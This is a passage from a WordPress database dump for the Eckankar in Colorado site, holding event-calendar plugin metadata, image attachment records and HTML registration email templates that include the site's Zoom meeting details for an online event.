arouselthumb\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31367;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22678;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22477;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194997,269324,'_thumbnail_id','268857'),(194998,269326,'mec_color',''),(194999,269326,'mec_location_id','185'),(195000,269326,'mec_dont_show_map','0'),(195001,269326,'mec_organizer_id','1'),(195002,269326,'mec_read_more',''),(195003,269326,'mec_more_info',''),(195004,269326,'mec_more_info_title',''),(195005,269326,'mec_more_info_target','_self'),(195006,269326,'mec_cost',''),(195007,269326,'mec_currency','a:0:{}'),(195008,269326,'mec_additional_organizer_ids','a:0:{}'),(195009,269326,'mec_additional_location_ids','a:0:{}'),(195010,269326,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-12\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-12\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195011,269326,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195012,269326,'mec_certain_weekdays','a:0:{}'),(195013,269326,'mec_allday','0'),(195014,269326,'one_occurrence','0'),(195015,269326,'mec_hide_time','0'),(195016,269326,'mec_hide_end_time','0'),(195017,269326,'mec_comment',''),(195018,269326,'mec_timezone','global'),(195019,269326,'mec_countdown_method','global'),(195020,269326,'mec_public','1'),(195021,269326,'mec_start_date','2023-11-12'),(195022,269326,'mec_start_time_hour','10'),(195023,269326,'mec_start_time_minutes','30'),(195024,269326,'mec_start_time_ampm','AM'),(195025,269326,'mec_start_day_seconds','37800'),(195026,269326,'mec_end_date','2023-11-12'),(195027,269326,'mec_end_time_hour','11'),(195028,269326,'mec_end_time_minutes','30'),(195029,269326,'mec_end_time_ampm','AM'),(195030,269326,'mec_end_day_seconds','41400'),(195031,269326,'mec_repeat_status','0'),(195032,269326,'mec_repeat_type',''),(195033,269326,'mec_repeat_interval','1'),(195034,269326,'mec_repeat_end',''),(195035,269326,'mec_repeat_end_at_occurrences','9'),(195036,269326,'mec_repeat_end_at_date',''),(195037,269326,'mec_advanced_days','a:0:{}'),(195038,269326,'mec_in_days',''),(195039,269326,'mec_not_in_days',''),(195040,269326,'mec_hourly_schedules','a:0:{}'),(195041,269326,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195042,269326,'mec_tickets','a:0:{}'),(195043,269326,'mec_fees_global_inheritance','1'),(195044,269326,'mec_fees','a:0:{}'),(195045,269326,'mec_ticket_variations_global_inheritance','1'),(195046,269326,'mec_ticket_variations','a:0:{}'),(195047,269326,'mec_reg_fields_global_inheritance','1'),(195048,269326,'mec_reg_fields','a:0:{}'),(195049,269326,'mec_bfixed_fields','a:0:{}'),(195050,269326,'mec_op','a:0:{}'),(195051,269326,'mec_fields','a:0:{}'),(195052,269326,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(195053,269326,'mec_event_status','EventScheduled'),(195054,269326,'mec_moved_online_link',''),(195055,269326,'mec_cancelled_reason',''),(195056,269326,'mec_display_cancellation_reason_in_single_page',''),(195057,269326,'protect_children',''),(195058,269326,'passster_activate_global_protection',NULL),(195059,269326,'passster_activate_protection',NULL),(195060,269326,'passster_protection_type','password'),(195061,269326,'boldgrid_hide_page_title','0'),(195062,269326,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(195063,269326,'boldgrid_in_page_containers','1'),(195109,269329,'one_occurrence','0'),(195065,269326,'_wp_old_date','2022-04-30'),(195066,269326,'passster_area_shortcode',''),(195067,269326,'mec_cost_auto_calculate','0'),(195068,269326,'mec_style_per_event','global'),(195069,269326,'mec_trailer_url',''),(195070,269326,'mec_trailer_title',''),(195071,269326,'mec_start_datetime','2023-11-12 10:30 AM'),(195072,269326,'mec_end_datetime','2023-11-12 11:30 AM'),(195073,269326,'mec_sequence','18'),(195074,269326,'mec_event_gallery','a:0:{}'),(195075,269326,'mec_related_events','a:0:{}'),(195076,269326,'mec_banner','a:0:{}'),(195078,269326,'_dp_original','268843'),(195079,269326,'_edit_lock','1698957588:2'),(195080,269326,'_edit_last','2'),(195081,269325,'original-file','2023/11/hu-sos-golden-2-updraft-pre-smush-original.jpg'),(195082,269325,'smush-complete','1'),(195083,269325,'smush-info','The file was compressed from 69.60 KB to 63.38 KB, saving 8.94 percent, using WP-Optimize'),(195084,269325,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:71272;s:12:\"smushed-size\";i:64897;s:15:\"savings-percent\";d:8.9399999999999995026200849679298698902130126953125;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:71272;s:10:\"compressed\";i:64897;}s:6:\"medium\";a:2:{s:8:\"original\";i:16687;s:10:\"compressed\";i:16148;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7069;s:10:\"compressed\";i:7051;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:55329;s:10:\"compressed\";i:53299;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20263;s:10:\"compressed\";i:19588;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:43865;s:10:\"compressed\";i:42544;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31367;s:10:\"compressed\";i:30270;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22678;s:10:\"compressed\";i:21967;}s:8:\"tileview\";a:2:{s:8:\"original\";i:22477;s:10:\"compressed\";i:21801;}}}'),(195108,269329,'mec_allday','0'),(195089,269326,'_thumbnail_id','269328'),(195092,269329,'protect_children',''),(195093,269329,'mec_color',''),(195094,269329,'mec_location_id','164'),(195095,269329,'mec_dont_show_map','0'),(195096,269329,'mec_organizer_id','1'),(195097,269329,'mec_read_more',''),(195098,269329,'mec_more_info',''),(195099,269329,'mec_more_info_title',''),(195100,269329,'mec_more_info_target','_self'),(195101,269329,'mec_cost',''),(195102,269329,'mec_currency','a:0:{}'),(195103,269329,'mec_additional_organizer_ids','a:0:{}'),(195104,269329,'mec_additional_location_ids','a:0:{}'),(195105,269329,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-10\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195106,269329,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195107,269329,'mec_certain_weekdays','a:0:{}'),(195087,269328,'_wp_attached_file','2023/11/skylight-1tree-1.jpg'),(195088,269328,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:842;s:6:\"height\";i:452;s:4:\"file\";s:28:\"2023/11/skylight-1tree-1.jpg\";s:8:\"filesize\";i:75692;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-350x188.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15067;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6469;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-768x412.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53921;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20424;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-500x452.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46187;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30817;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21731;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"skylight-1tree-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24230;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195110,269329,'mec_hide_time','0'),(195111,269329,'mec_hide_end_time','0'),(195112,269329,'mec_comment',''),(195113,269329,'mec_timezone','global'),(195114,269329,'mec_countdown_method','global'),(195115,269329,'mec_public','1'),(195116,269329,'mec_start_date','2022-12-10'),(195117,269329,'mec_start_time_hour','11'),(195118,269329,'mec_start_time_minutes','0'),(195119,269329,'mec_start_time_ampm','AM'),(195120,269329,'mec_start_day_seconds','39600'),(195121,269329,'mec_end_date','2022-12-10'),(195122,269329,'mec_end_time_hour','12'),(195123,269329,'mec_end_time_minutes','0'),(195124,269329,'mec_end_time_ampm','PM'),(195125,269329,'mec_end_day_seconds','43200'),(195126,269329,'mec_repeat_status','0'),(195127,269329,'mec_repeat_type',''),(195128,269329,'mec_repeat_interval','1'),(195129,269329,'mec_repeat_end',''),(195130,269329,'mec_repeat_end_at_occurrences','9'),(195131,269329,'mec_repeat_end_at_date',''),(195132,269329,'mec_advanced_days','a:0:{}'),(195133,269329,'mec_in_days',''),(195134,269329,'mec_not_in_days',''),(195135,269329,'mec_hourly_schedules','a:0:{}'),(195136,269329,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195174,269329,'mec_event_gallery','a:0:{}'),(195175,269329,'mec_related_events','a:0:{}'),(195137,269329,'mec_tickets','a:0:{}'),(195138,269329,'mec_fees_global_inheritance','1'),(195139,269329,'mec_fees','a:0:{}'),(195140,269329,'mec_ticket_variations_global_inheritance','1'),(195141,269329,'mec_ticket_variations','a:0:{}'),(195142,269329,'mec_reg_fields_global_inheritance','1'),(195143,269329,'mec_reg_fields','a:0:{}'),(195144,269329,'mec_bfixed_fields','a:0:{}'),(195145,269329,'mec_op','a:0:{}'),(195146,269329,'mec_fields','a:0:{}'),(195147,269329,'mec_event_status','EventScheduled'),(195148,269329,'mec_moved_online_link',''),(195149,269329,'mec_cancelled_reason',''),(195150,269329,'mec_display_cancellation_reason_in_single_page',''),(195151,269329,'boldgrid_hide_page_title','0'),(195152,269329,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(195153,269329,'passster_activate_global_protection',NULL),(195154,269329,'passster_activate_protection',NULL),(195155,269329,'passster_protection_type','password'),(195156,269329,'boldgrid_in_page_containers','1'),(195157,269329,'_thumbnail_id','267350'),(195159,269329,'_dp_original','267449'),(195160,269329,'_edit_lock','1698957823:2'),(195161,269328,'original-file','2023/11/skylight-1tree-1-updraft-pre-smush-original.jpg'),(195162,269329,'passster_area_shortcode',''),(195163,269328,'smush-complete','1'),(195164,269328,'smush-info','The file was compressed from 73.92 KB to 70.11 KB, saving 5.15 percent, using 